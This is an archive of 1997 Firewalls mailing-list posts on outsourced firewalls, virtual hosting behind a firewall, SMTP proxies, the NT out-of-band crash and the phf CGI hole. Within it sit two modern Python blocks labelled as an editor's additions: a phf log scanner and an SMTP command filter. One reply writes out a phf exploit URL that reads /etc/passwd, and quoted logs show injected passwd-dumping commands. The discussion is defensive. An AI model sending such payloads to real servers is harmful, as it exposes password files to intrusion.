What level of expertise does the third party have? (Your third-party vendor should have a significantly sized team of security engineers that have substantial background and knowledge in the security areas you need/choose).

What standard services does the third party perform? You (the customer) must have the ability to sit with the third party and "design a unique-to-you" security service. YOU must be able to determine the rules. You must have the power to change those rules at any time (24*7*365).

What value-added services does the third party perform? Do they perform monitoring for suspicious activity? Do they perform backups on all of the critical files and maintain them off-site (this should be part of your disaster recovery plan for all systems)? Do they provide you with a detailed report of what happened on the firewall?

Once you have weighed these issues (these being a sample of the total questions you need to ask yourself and the third-party provider), you should be able to make a determination on whether to handle the task in-house or out-source.

Hope this helps,
Bob

>----------
>From: Mariko Yashada[SMTP:mariko@grfn.org]
>Sent: Wednesday, June 04, 1997 3:01 PM
>To: Firewalls Mailing List
>Subject: Re: ISP Connection
>
>
>
>Thank you for all your comments. Last fall our plan was to connect to the
>Internet through MCI. We security people said fine, but you will need a
>firewall for any connections between the Internet and the Enterprise
>Network. So we did an evaluation of firewalls and settled on two we felt
>best suited our needs.
>The firewall added enough cost to the project that
>it was postponed. It has now been revived using our ISP for the connection
>with the hope the ISP can some way offer the security. I see now we should
>follow our original plan and put up a firewall at our end.
>
>
>Here is a related question:
>
>There is another local ISP who will connect us at T1 and install a firewall
>at our location. They will then administer the firewall remotely from their
>location. They support three different firewalls, Gauntlet, Firewall-1 and
>Borderware. The advantage is the savings in admin costs. Has anyone had any
>experience with this type of arrangement? We have also talked to BBN about
>their Site Patrol product, which is a remotely managed Gauntlet.
>
>Thanks,
>
>Mariko
>

From owner-firewalls-outgoing Thu Jun 5 11:33:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16373 for firewalls-outgoing; Thu, 5 Jun 1997 05:47:10 -0700 (PDT)
Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA16349 for ; Thu, 5 Jun 1997 05:46:55 -0700 (PDT)
Received: from anton.the-wire.com (anton.the-wire.com [205.206.32.227]) by psyche.the-wire.com (8.8.5/8.6.12) with SMTP id IAA16830; Thu, 5 Jun 1997 08:45:40 -0400 (EDT)
Message-Id: <3.0.32.19970605082442.0094c5f0@the-wire.com>
X-Sender: anton@the-wire.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Thu, 05 Jun 1997 08:47:10 -0400
To: Bernd Eckenfels
From: Anton J Aylward
Subject: Re: Plug-gw- One to many relationship
Cc: firewalls@greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:07 AM 05/06/97 +0200, you wrote:

## Reply Start ##

>Hi,
>
>> No, no, no, what *I* want and what about 10^7 other sites want is this...
>>
>>   client A                       server C
>>              W    firewall       server D
>>   client B                       server F
>>                                  server G
>>                                  server H
>>                                  server I
>>                                  server K
>
>there are 2 Solutions (if we are talking about WWW)

Yes, we are.

>a) use different Ports
>   W:80   -> C:80
>   W:8080 -> D:80
>   W:8081 -> E:80

Thank you, granted, but not the question I was posing. This is a specific answer not a general one.

>b) use the Host Command from HTTP which no browser nor Server does Support
>   yet :)

Good thing you put the smiley in.

>To get back on it, its not a problem of software, but of design. There is no
>way a Server can tell what the host part of an URL was other than looking at
>the connected address:port Combination. If you have only one valid address
>you can run only one server at a given port.

Now we're getting down to it. Most of the people who have responded to me have missed out on a very important fact.

You can't regenerate lost information.

If we have a publicly available DNS - somewhere out on the 'net - has that single IP address ("W" in my diagram above) for all of

    www.company001.com  for server "C"
    www.company002.com  for server "D"
    www.company003.com  for server "E"
    ...
    www.company253.com  ......
    www.company254.com  ......

The fw sees an incoming packet from a remote client which has

    SrcAddr:
    DstAddr: the single address supplied by DNS
    Port:    80

then the DNS mapping has LOST information. To tell whether to map a connection to "W:80" to server "C" or to server "D" requires regenerating this information.

Now the answer (B) above takes the view that the message body contains this information. Problem solved, there is a means of regenerating the information. Only it isn't there.

If this problem were trivially solvable, then we wouldn't be doing IP masquerading on web servers. We would have a single (physical) server with a single (software) instance of the server running for all of

    www.company001.com
    www.company002.com
    www.company003.com
    ...
    www.company253.com
    www.company254.com

We don't do this; we are eating up IP addresses for each and every server quite independently of the NAT situation.

I believe this is a problem in information content. The HOST command, as Bernd says, is not implemented widely enough to make it practical. The people who talk about kernel hack support for a plug-gw solution have not made it clear how the lost information is to be regenerated.

I'd like to shift the focus of this discussion away from talking about hacking plug-gw and to the real question, one of Information Theory. I say again, the many-to-one mapping of DNS is information lossy. How are you going to generate that information so that whatever your code hack is can perform the correct one-to-many mapping at the firewall?

Like Alice talking to the Cat: You have to know where you're going.

## Reply End ##

--------------------------------------------------------------------------
Anton J Aylward                  | Security is not something that comes in
The Strahn & Strachan Group Inc  | a self-contained box. It is an attribute
Information Security Consultants | of how you do business and as such
Voice: (416) 494-8661            | needs to be managed carefully.
Fax:   (416) 494-8803            |      - Karen Goertzel, Wang Federal Inc.

From owner-firewalls-outgoing Thu Jun 5 11:42:52 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13925 for firewalls-outgoing; Thu, 5 Jun 1997 10:04:47 -0700 (PDT)
Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13891 for ; Thu, 5 Jun 1997 10:04:30 -0700 (PDT)
Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id KAA10423; Thu, 5 Jun 1997 10:08:27 -0700 (PDT)
Date: Thu, 5 Jun 1997 10:08:26 -0700 (PDT)
From: "Sameer R.
Manek"
To: Stan Wnuck
cc: firewalls@GreatCircle.COM
Subject: Re: psswd HACK
In-Reply-To: <199706051407.HAA20909@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This is how the exploit is done

http://"name of server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

But that's not really important. Let's assume they got your passwd file. That means they have the option to crack on that passwd file; let's assume they did that too. They, in theory, know the login and password of every one on that machine. I'll bet the login names and passwords of people on your webserver are the same as their login/password on other machines on your network. Does this cause concern? It should. Given the fact that they ran the phf script in April, they've had at least a month to run crack. Assume that your webserver has been compromised and they have had a sniffer running on that box for a month; what would you do?
You need to think about the worst-case scenario and work backwards instead of thinking 'oh, all they got was my password file'.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sameer Manek                          manek@challenger.atc.fhda.edu
The last four line .signature file on the entire internet
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From owner-firewalls-outgoing Thu Jun 5 12:02:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24820 for firewalls-outgoing; Thu, 5 Jun 1997 08:03:32 -0700 (PDT)
Received: from diderot.sibernet.com.tr (sb-router.sibernet.com.tr [195.142.229.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA24592 for ; Thu, 5 Jun 1997 08:01:10 -0700 (PDT)
Received: from localhost (root@localhost) by diderot.sibernet.com.tr (8.8.5/8.6.9) with SMTP id SAA04125; Thu, 5 Jun 1997 18:05:24 +0300
Date: Thu, 5 Jun 1997 18:05:24 +0300 (EET DST)
From: Root Admin-KSoft
X-Sender: root@diderot
To: Stan Wnuck
cc: Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997, Stan Wnuck wrote:

> Hi all,
>
> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140

Since the result code is 200 (success), it seems that you have phf; please disable it ASAP. Go to the cgi-bin directory and do a chmod 0 phf... Please refer to my previous mail also.
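The hole behind Sameer's URL and Kerem's "chmod 0 phf" advice, as an added example (editor's code, not taken from any of the posted messages): phf handed the query-string values to popen() after running them through NCSA httpd's escape_shell_cmd(), which backslash-escaped shell metacharacters but forgot newline, so a "%0a" ended the ph command and started the attacker's own. The block reconstructs that filter beside the fixed one and runs a scan over log lines modelled on the ones Stan posted. The metacharacter list is my reading of the NCSA util.c source and is an assumption; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Shell metacharacters the original NCSA httpd escape_shell_cmd() backslash-
# escaped before handing user input to popen(). This list is my reading of
# the NCSA util.c source and is an assumption. Newline (0x0a, "%0a" in a URL)
# is absent from it, and that omission is the phf hole.
NCSA_META = set('&;`\'"|*?~<>^()[]{}$\\')
# The patched filter adds newline (and carriage return) to the set.
FIXED_META = NCSA_META | {'\n', '\r'}


def escape_shell_cmd(text, meta):
    """Prefix every character in meta with a backslash, as escape_shell_cmd() did."""
    return ''.join('\\' + ch if ch in meta else ch for ch in text)


def split_shell_lines(escaped):
    """Split an escaped string into the command lines /bin/sh would see: a
    backslash quotes the next character (so backslash-newline continues the
    line), while a bare newline ends the current command."""
    lines, cur, i = [], [], 0
    while i < len(escaped):
        ch = escaped[i]
        if ch == '\\' and i + 1 < len(escaped):
            cur.append(escaped[i:i + 2])
            i += 2
            continue
        if ch == '\n':
            lines.append(''.join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    lines.append(''.join(cur))
    return lines


def injected_commands(value, meta):
    """Extra commands one query-string value would run once spliced into the
    'ph -m ...' command line that phf built, given the escaping in meta."""
    lines = split_shell_lines(escape_shell_cmd(value, meta))
    return [line.strip() for line in lines[1:] if line.strip()]


# Common log format: host ident user [date] "method url proto" status size
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) ')


def scan_log(lines):
    """Flag phf requests whose parameters carry an injected command. Status 200
    means phf existed and ran the request (the hole is present); 404 means the
    script was not there, so the probe failed."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group('url').partition('?')
        if not path.endswith('/cgi-bin/phf'):
            continue
        cmds = []
        for param in query.split('&'):
            _, _, raw = param.partition('=')
            cmds += injected_commands(unquote(raw), NCSA_META)
        if cmds:
            hits.append({'host': m.group('host'),
                         'status': int(m.group('status')),
                         'executed': m.group('status') == '200',
                         'commands': cmds})
    return hits


# Constructed sample log, adapted from the two entries Stan posted, plus one
# legitimate phf query and one probe against a server that has no phf.
SAMPLE_LOG = [
    'some.remote.location.edu - - [28/Apr/1997:01:33:21 -0400] "GET /cgi-bin/phf?'
    'Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A'
    '&Qalias=&Qname=foo HTTP/1.0" 200 140',
    'some.remote.location.edu - - [28/Apr/1997:01:33:23 -0400] '
    '"GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 143',
    'client.example.edu - - [28/Apr/1997:02:10:05 -0400] '
    '"GET /cgi-bin/phf?Qname=smith&Qalias= HTTP/1.0" 200 812',
    'other.example.net - - [29/Apr/1997:03:00:00 -0400] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 143',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The scan deliberately decodes each parameter before looking for the newline, since "%0A" and "%0a" are the same byte once the server unescapes the query; and it reports the status code separately, because a 200 on such a request is the evidence that phf was present and ran, which is what Kerem keys on.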
Best Regards
Kerem ERSOY

> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?
>
>
> I changed the real source location to a fake some.remote.location.edu to
> not let out the bag of the source of this hack, since I am not sure what
> my next move would be.

OK, but your e-mail address is probably giving away your some.remote.site, isn't it :)

>
>
> Thanks in advance.
>
>
>
> Stan Wnuck swnuck@unixpros.com
> Unixpros, Inc.
> 10 Industrial Way East (908) 389-3295 x542
> Eatontown, NJ 07724 (908) 389-5461 Fax
>
> PM-CHS Technology Insertion Office
> Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963
>

+----------------------------------------------------
sibernet internet security experts
and sokak 8/1 cankaya ankara turkiye 06680
tel : +90-312-4670198 (pbx) fax: +90-312-4670199
http://www.sibernet.com.tr/ mail: info@sibernet.com.tr

From owner-firewalls-outgoing Thu Jun 5 12:20:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA18788 for firewalls-outgoing; Thu, 5 Jun 1997 10:30:19 -0700 (PDT)
Received: from newfed.frb.gov (newfed.frb.gov [198.3.221.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA18730 for ; Thu, 5 Jun 1997 10:30:04 -0700 (PDT)
Received: from FRB.GOV (umailfwd@localhost) by newfed.frb.gov (8.8.5/8.8.5) with UUCP id NAA23124; Thu, 5 Jun 1997 13:13:10 -0400 (EDT)
Received: from kryten.frb.gov by frbgate.FRB.GOV (4.1/SMI-4.0) id AA16199; Thu, 5 Jun 97 13:18:51 EDT
Received: from localhost.frb.gov (localhost.frb.gov [127.0.0.1]) by kryten.frb.gov (8.8.5/8.8.5) with SMTP id NAA08468; Thu, 5 Jun 1997 13:18:51 -0400 (EDT)
Message-Id: <199706051718.NAA08468@kryten.frb.gov>
X-Authentication-Warning: kryten.frb.gov: localhost.frb.gov [127.0.0.1] didn't use HELO protocol
X-Mailer: exmh version 1.6.5 12/11/95
To: Cy Ardoin
Cc: Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)
In-Reply-To: Your message of "Wed, 04 Jun 1997 19:45:07 EDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 05 Jun 1997 13:18:49 -0400
From: "Jonathan M. Bresler"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I don't think there is anything an application firewall can
>do that can't also be done by a "packet filter" firewall.

The trivial example: an SMTP application level proxy can disable the "debug" command for every sendmail behind that firewall.

>new packet filter firewalls are not like the old Cisco/Bay router
>filters. The new systems operate at the network layer, but they
>have knowledge of the protocols and applications. They
>open up the packets and modify the data. These systems are
>doing content filtering and other "application" types of operations.
>Yes, not all of them do these things, but many do, and new
>feature/functions are being added to these systems every year.

jmb
--
Jonathan M. Bresler 202-452-2831 breslerj@frb.gov
MS-169 Federal Reserve Board of Governors Washington DC 20551
Speaking for myself.
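Bresler's trivial example, as an added illustration placed after his message (editor's code, not anything he or the list posted): a command-level SMTP filter of the kind an application proxy runs. The point a packet filter cannot express is in the state: the proxy refuses DEBUG and WIZ only when they arrive as commands, which means it has to track when the server has answered 354 and the client is sending message body, where the same word must pass untouched. The allowlist, the fake_sendmail stand-in and the session are constructed.

```python
# SMTP verbs a client may send through the proxy (the RFC 821 core set; the
# allowlist is my choice). Anything else, including sendmail's old DEBUG, WIZ
# and KILL extensions, is answered by the proxy itself and never reaches the
# real server.
ALLOWED_VERBS = {'HELO', 'EHLO', 'MAIL', 'RCPT', 'DATA', 'RSET', 'NOOP', 'QUIT', 'HELP'}


class SmtpCommandFilter:
    """Per-connection state of an application-level SMTP proxy.

    A client line is a command only outside the DATA phase, and the DATA
    phase starts only once the server has answered 354, so the proxy must
    watch both directions. The same text ("DEBUG") is refused as a command
    but forwarded untouched as a line of message body.
    """

    def __init__(self, allowed=ALLOWED_VERBS):
        self.allowed = allowed
        self.awaiting_354 = False   # client sent DATA, server has not answered yet
        self.in_data = False        # forwarding message body until "."
        self.rejected = []          # verbs the proxy refused, for the audit log

    def from_client(self, line):
        """Return ('forward', line) to pass the line on, or ('reply', text)
        when the proxy answers the client itself and drops the line."""
        if self.in_data:
            if line == '.':
                self.in_data = False
            return ('forward', line)
        verb = line.strip().split(' ', 1)[0].upper()
        if verb not in self.allowed:
            self.rejected.append(verb)
            return ('reply', '500 Syntax error, command unrecognized')
        if verb == 'DATA':
            self.awaiting_354 = True
        return ('forward', line)

    def from_server(self, reply):
        """Track the server's answer to DATA; replies are passed through."""
        if self.awaiting_354:
            self.awaiting_354 = False
            if reply.startswith('354'):
                self.in_data = True
        return ('forward', reply)


def fake_sendmail(line, state):
    """Constructed stand-in for the sendmail behind the firewall. It accepts
    every command it sees, which is the point: it never sees DEBUG or WIZ."""
    if state['in_data']:
        if line == '.':
            state['in_data'] = False
            return '250 Message accepted for delivery'
        return None                       # body lines draw no reply
    verb = line.split(' ', 1)[0].upper()
    if verb == 'DATA':
        state['in_data'] = True
        return '354 Enter mail, end with "." on a line by itself'
    if verb == 'QUIT':
        return '221 closing connection'
    return '250 OK'


def run_session(client_lines):
    """Drive one client session through the filter and the fake server.
    Returns the transcript as (direction, text) pairs and the refused verbs."""
    proxy = SmtpCommandFilter()
    server = {'in_data': False}
    transcript = []
    for line in client_lines:
        action, text = proxy.from_client(line)
        if action == 'reply':
            transcript.append(('proxy->client', text))
            continue
        transcript.append(('proxy->server', text))
        reply = fake_sendmail(text, server)
        if reply is not None:
            transcript.append(('server->client', proxy.from_server(reply)[1]))
    return transcript, proxy.rejected


# Constructed session: DEBUG and WIZ sent as commands, then the word "DEBUG"
# again as a line of the message body, which must go through.
SESSION = [
    'HELO client.example.org',
    'MAIL FROM:<alice@example.org>',
    'RCPT TO:<bob@example.net>',
    'DEBUG',
    'WIZ',
    'DATA',
    'Subject: test',
    '',
    'DEBUG',
    '.',
    'QUIT',
]

if __name__ == '__main__':
    for direction, text in run_session(SESSION)[0]:
        print(f'{direction:14} {text}')
```

A stateful packet filter that matched on the bytes "DEBUG" would either miss the command inside a segment that also carries other data or block a legitimate message containing that word; the proxy gets it right because it reassembles the stream and knows which side of the 354 it is on.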
Others speak for the Federal Reserve Board of Governors

From owner-firewalls-outgoing Thu Jun 5 13:04:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13650 for firewalls-outgoing; Thu, 5 Jun 1997 10:02:42 -0700 (PDT)
Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13612 for ; Thu, 5 Jun 1997 10:02:22 -0700 (PDT)
Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id SAA13564 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 18:08:50 +0100 (BST)
Date: Thu, 5 Jun 1997 18:00:14 +0100 (BST)
From: Daniel Strawson
To: Craig Brozefsky
cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

OK, public apology time - I've taken a look at this again. The urgent point is not an IP option (as I had understood), but a TCP option. Hence, the 'IP Options' stuff in FW-1 doesn't apply and the packets will get through.

For the record, however, FW-1 does drop all packets with IP header options as none of these should be used nowadays (manual page 295).

Sorry for adding confusion.

Cheers,

Daniel

On Thu, 5 Jun 1997, Craig Brozefsky wrote:

> On Thu, 5 Jun 1997, Daniel Strawson wrote:
>
> > Hang on a moment.
> >
> > Let me put this in perspective.
> >
> > As I understand it, this problem results from sending packets with a
> > particular IP option set in the header. (Please confirm I'm right here
> > someone).
> >
> > Firewall _SHOULD_ drop all packets with IP options set. This would mean
> > that all Firewall-1 systems and systems behind Firewall-1 are impervious
> > to this attack. (something for Checkpoint to be proud of).
>
> Uhm, I don't have any RFCs or source code in front of me right now, but
> my understanding was that several options would need to get thru, OOB
> being one of them, as some applications make use of it, telnet for
> instance if I'm not mistaken (tho I may be and invite correction).
>
> > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to
> > crash, you get the NT system that it is running on to crash, so it is not
> > an insecurity, but a claimed feature that doesn't work.
>
> Not how I would interpret it. I would consider this the responsibility
> of the FW vendor. They are responsible for the TCP/IP stack IMO. If they
> aren't replacing it, then they are assuming the OS vendor is competent,
> not something I would agree with.
>
> Craig Brozefsky craig@onshore.com
> onShore Inc. http://www.onshore.com/~craig
> Development Team p_priority=PFUN+(p_work/4)+(2*p_cash)
>
>

From owner-firewalls-outgoing Thu Jun 5 13:04:27 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01504 for firewalls-outgoing; Thu, 5 Jun 1997 08:52:04 -0700 (PDT)
Received: from zippy.radian.com (zippy.radian.com [129.160.16.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA01422 for ; Thu, 5 Jun 1997 08:51:40 -0700 (PDT)
Received: from ccsmtpgate.radian.com (ccsmtpgate.radian.com [129.160.224.126]) by zippy.radian.com (8.8.5/8.8.5) with SMTP id KAA16712 for ; Thu, 5 Jun 1997 10:53:55 -0500 (CDT)
Received: from ccMail by ccsmtpgate.radian.com (IMA Internet Exchange 2.1 Enterprise) id 000D79B8; Thu, 5 Jun 97 10:54:46 -0500
Mime-Version: 1.0
Date: Thu, 5 Jun 1997 10:51:53 -0500
Message-ID: <000D79B8.3356@radian.com>
From: Mark_Flanagan@radian.com (Mark Flanagan)
Subject: Microsoft NetMeeting
To: firewalls@greatcircle.com
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Description: cc:Mail note part
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone have or can
you point me to a site with the particulars on Microsoft NetMeeting. I'm looking for the protocol, ports, security risks, etc.

Thanks in advance.

Mark Flanagan
mark_flanagan@radian.com

From owner-firewalls-outgoing Thu Jun 5 13:17:45 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23912 for firewalls-outgoing; Thu, 5 Jun 1997 07:53:29 -0700 (PDT)
Received: from diderot.sibernet.com.tr (sb-router.sibernet.com.tr [195.142.229.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23816 for ; Thu, 5 Jun 1997 07:52:23 -0700 (PDT)
Received: from localhost (root@localhost) by diderot.sibernet.com.tr (8.8.5/8.6.9) with SMTP id RAA04099; Thu, 5 Jun 1997 17:56:27 +0300
Date: Thu, 5 Jun 1997 17:56:26 +0300 (EET DST)
From: Root Admin-KSoft
X-Sender: root@diderot
To: Arnaud Girsch
cc: Stan Wnuck , Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
In-Reply-To: <199706042108.OAA27744@mail.marben.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997, Arnaud Girsch wrote:

> > > I have noticed on my WWW log files the following 2 entries.
> > >
> > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143

Once, all the httpd daemons came bundled with a script called phf. This script was initially designed to build a mechanism like finger + whois. But there's a bug in this phf script: when it is used as above it could print any file (in this case /etc/passwd!!!!) or run any command with root privilege. I mean somebody tried to hack your passwd file.
The best thing to do is to go to your cgi-bin directory and issue a "chmod 0 phf", and if you think you still need it, pick a patched one; I cannot remember where. But it means that somebody definitely tried to hack your system....

> >
> >
> >
> > Does anyone know anything about these cgi scripts or programs?
> > Or how dangerous this is?
>
> These are well known cgi scripts containing security holes.
> The phf script coming with the default NCSA server is buggy, and should be
> disabled. (it allows execution of shell programs)
>
> Arnaud.
>
> --
> Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
> agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/
>

+----------------------------------------------------
sibernet internet security experts
and sokak 8/1 cankaya ankara turkiye 06680
tel : +90-312-4670198 (pbx) fax: +90-312-4670199
http://www.sibernet.com.tr/ mail: info@sibernet.com.tr

From owner-firewalls-outgoing Thu Jun 5 15:08:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13487 for firewalls-outgoing; Thu, 5 Jun 1997 10:01:38 -0700 (PDT)
Received: from gate.adtranz-signal.co.uk (gate.adtranz-signal.co.uk [171.29.54.135]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA13383 for ; Thu, 5 Jun 1997 10:01:14 -0700 (PDT)
Received: from mail-server.ply.adtranz-signal.co.uk (mail-server.ply.adtranz-signal.co.uk [171.30.30.102]) by gate.adtranz-signal.co.uk (8.6.12/8.6.12) with SMTP id SAA10998; Thu, 5 Jun 1997 18:09:02 +0100
Received: from [171.30.30.104] by mail-server.ply.adtranz-signal.co.uk (SMTPD32-3.04) id AFBD48B0084; Thu, 05 Jun 1997 18:04:45 +0000
Received: by PAVPC.ply.adtranz-signal.co.uk with Microsoft Mail id <01BC71DA.F3A690C0@PAVPC.ply.adtranz-signal.co.uk>; Thu, 5 Jun 1997 18:04:46 -0000
Message-ID: <01BC71DA.F3A690C0@PAVPC.ply.adtranz-signal.co.uk>
From: Pete Vickers
To: Jyri Kaljundi , "'Bryan D.
Boyle'"
Cc: "firewalls@GreatCircle.COM"
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Date: Thu, 5 Jun 1997 18:04:45 -0000
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I was under the impression that since FW-1 only supported several net i/f cards that they rewrote the drivers for these, and thus managed to get between the OS and the card h/w.

[pls correct me if I'm wrong, this was only an assumption !]

Pete

----------
From: Bryan D. Boyle
Sent: 05 June 1997 13:46
To: Jyri Kaljundi
Cc: firewalls@GreatCircle.COM
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

At 03:08 PM 6/5/97 +0300, you wrote:
>You mean you can crash an NT FW-1 by sending OOB data to it?!
>That's scary if it is true and should be addressed by Check Point ASAP!
>

It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS.

>What I have always thought of FW-1 is that it operates at quite low level
>inside the OS kernel, that as long as you filter everything the network
>bugs in the OS don't really matter, as the packets never reach FW-1.

Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews.

>
>If sending some bytes of data to FW1 crashes it and the OS, this
>combination (FW1+NT) should not be used as a firewall solution at all.
>May
>be someone from CP could explain, how much do the bugs in the OS matter
>once FW1 is installed.

If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT. But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now.

Just my opinion, $.02 US, etc. Flames to /dev/null.

--
Bryan D. Boyle           | LOGICAL:    bdboyle@att.com 201-386-8584
#include                 | VIRTUAL:    http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc.  | PHYSICAL:   Whippany, NJ
                         | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
"What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787

From owner-firewalls-outgoing Thu Jun 5 16:44:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09728 for firewalls-outgoing; Thu, 5 Jun 1997 09:39:56 -0700 (PDT)
Received: from gateway-out.corp.usweb.com (gateway-out.usweb.com [205.180.171.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA09707 for ; Thu, 5 Jun 1997 09:39:40 -0700 (PDT)
Received: by gateway-out.corp.usweb.com; id IAA13653; Thu, 5 Jun 1997 08:49:03 -0700
Received: from mailhub.corp.usweb.com(172.16.1.11) by gateway-out.corp.usweb.com via smap (V3.1.1) id xma013578; Thu, 5 Jun 97 08:48:39 -0700
Received: by mailhub.corp.usweb.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC7195.093A9030@mailhub.corp.usweb.com>; Thu, 5 Jun 1997 09:44:17 -0700
Message-ID:
From: Eric Tebelak
To: "'Daniel Strawson'" , "'Jyri Kaljundi'"
Cc: "'Greg Loffel'" , "'fw-1-mailinglist@us.checkpoint.com'" , "'Firewalls mailing list'"
